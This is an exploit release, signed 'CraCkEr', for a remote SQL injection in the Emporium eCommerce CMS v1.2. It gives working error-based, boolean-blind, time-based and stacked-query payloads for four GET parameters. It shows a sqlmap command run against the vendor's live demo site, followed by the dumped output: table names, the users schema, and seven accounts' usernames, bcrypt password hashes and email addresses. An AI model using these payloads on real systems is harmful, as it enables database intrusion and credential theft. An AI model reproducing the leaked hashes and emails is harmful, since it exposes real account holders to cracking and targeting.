┌┌────────────────────────────────────────────────────────────────────────────────────┐
││                                  C r a C k E r                                    ┌┘
┌┘              T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────          From The Ashes and Dust Rises An Unimaginable crack....           ────┐
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                   [ Exploits ]                                    ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                     │ │                                         :
│  Website  : mybizcms.com                │ │                                         │
│  Vendor   : mybizcms                    │ │                                         │
│  Software : Emporium eCommerce -        │ │                                         │
│             Online Shopping CMS v 1.2   │ │ Emporium eCommerce                      │
│  Vuln Type: Remote SQL Injection        │ │                                         │
│  Method   : GET                         │ │ is a complete online                    │
│  Critical : High [░░▒▒▓▓██]             │ │ shopping platform for all your needs    │
│  Impact   : Database Access             │ │                                         │
│                                         │ │                                         │
│ ────────────────────────────────────────┘ └─────────────────────────────────────────│
│                           B4nks-NET irc.b4nks.tk #unix                             ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                     :
│  Release Notes:                                                                     │
│  ═════════════                                                                      │
│  Typically used for remotely exploitable vulnerabilities that can lead to           │
│  system compromise.                                                                 │
│                                                                                     │
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                   ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
     loool, DevS, Dark-Gost
       CryptoJob (Twitter) twitter.com/CryptozJob
┌┌────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                 © CraCkEr 2022                                    ┌┘
└────────────────────────────────────────────────────────────────────────────────────┘┘

There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories?


GET parameter 'min_price' is vulnerable

---
Parameter: min_price (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)
    Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41
---

GET parameter 'percentage' is vulnerable.

---
Parameter: percentage (GET)
    Type: boolean-based blind
    Title: MySQL boolean-based blind - Parameter replace (MAKE_SET)
    Payload: percentage=MAKE_SET(4728=4728,5649)

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS)
---

GET parameter 'review_ratings' is vulnerable

---
Parameter: review_ratings (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn)
---

GET parameter 'brand[]' is vulnerable

---
Parameter: brand[] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: brand[]=15');SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc
---

Live Demo Site:

https://mybizcms.com/demos/multivendor/


[+] Starting the Attack

sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent

[INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 7.3.33, PHP
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[INFO] fetching current database
current database: 'mybizcms_multivendor'


fetching tables for database: 'mybizcms_multivendor'
[101 tables]
 
+--------------------------+
| returns                  |
| ad_placements            |
| addresses                |
| ads                      |
| attribute_items          |
| attributes               |
| authorize_net_settings   |
| brands                   |
| categories               |
| collections              |
| company                  |
| counties                 |
| countries                |
| credit_card_types        |
| cronjobs                 |
| customers                |
| deliveries               |
| delivery_items           |
| delivery_options         |
| delivery_status          |
| discounts                |
| email_templates          |
| facebook_settings        |
| faqs                     |
| flash_sale_items         |
| flash_sales              |
| flutterwave_settings     |
| github_settings          |
| google_settings          |
| item_status              |
| labels                   |
| linkedin_settings        |
| logs                     |
| media                    |
| mpesa_settings           |
| newsletters              |
| notifications            |
| options                  |
| order_details            |
| order_items              |
| order_status             |
| orders                   |
| pages                    |
| payment_options          |
| payment_status           |
| payments                 |
| payout_modes             |
| payout_status            |
| payouts                  |
| paypal_pro_settings      |
| paypal_standard_settings |
| paytm_settings           |
| payu_money_settings      |
| permissions              |
| pesapal_settings         |
| pickup_stations          |
| post_categories          |
| post_comments            |
| posts                    |
| product_attributes       |
| product_images           |
| product_reviews          |
| product_stock            |
| product_types            |
| product_variants         |
| product_wholesales       |
| products                 |
| quicks                   |
| return_reasons           |
| return_status            |
| rewards                  |
| role_sub_permissions     |
| roles                    |
| saved_items              |
| sessions                 |
| shipping_fees            |
| shipping_regions         |
| shipping_weights         |
| shops                    |
| sliders                  |
| stripe_settings          |
| sub_permissions          |
| subscribers              |
| supported_currencies     |
| tags                     |
| taxes                    |
| temp_data                |
| ticket_priority          |
| ticket_replies           |
| ticket_status            |
| tickets                  |
| timezones                |
| twitter_settings         |
| twocheckout_settings     |
| user_status              |
| user_sub_permissions     |
| users                    |
| variant_choices          |
| variant_options          |
| wallets                  |
| weights                  |
+--------------------------+
 
fetching columns for table 'users' in database 'mybizcms_multivendor'
 
Table: users
[34 columns]
 
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| calling_code           | varchar(11)  |
| city                   | varchar(100) |
| company                | varchar(100) |
| country_id             | int(11)      |
| date_added             | datetime     |
| default_billing        | int(11)      |
| default_currency       | int(11)      |
| default_language       | varchar(40)  |
| default_shipping       | int(11)      |
| department_id          | int(11)      |
| email                  | varchar(100) |
| firstname              | varchar(50)  |
| last_ip                | varchar(40)  |
| last_login             | datetime     |
| last_password_change   | datetime     |
| lastname               | varchar(50)  |
| latitude               | varchar(300) |
| longitude              | varchar(300) |
| new_pass_key_requested | datetime     |
| passkey                | varchar(32)  |
| password               | varchar(256) |
| payout_address         | longtext     |
| payout_mode_id         | int(11)      |
| phone                  | varchar(30)  |
| postal_code            | varchar(100) |
| profile_image          | varchar(150) |
| role_id                | int(11)      |
| state                  | varchar(50)  |
| street                 | varchar(100) |
| user_id                | int(11)      |
| user_status_id         | int(11)      |
| user_uid               | varchar(50)  |
| username               | varchar(100) |
| zip_code               | varchar(15)  |
+------------------------+--------------+
 
fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor'
 
Database: mybizcms_multivendor
Table: users
[7 entries]
 
+----------+--------------------------------------------------------------+------------------------+
| username | password                                                     | email                  |
+----------+--------------------------------------------------------------+------------------------+
| admin    | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com     |
| one      | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com |
| two      | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con         |
| umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com      |
| three    | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com          |
| user     | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com      |
| tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com    |
+----------+--------------------------------------------------------------+------------------------+



[-] Done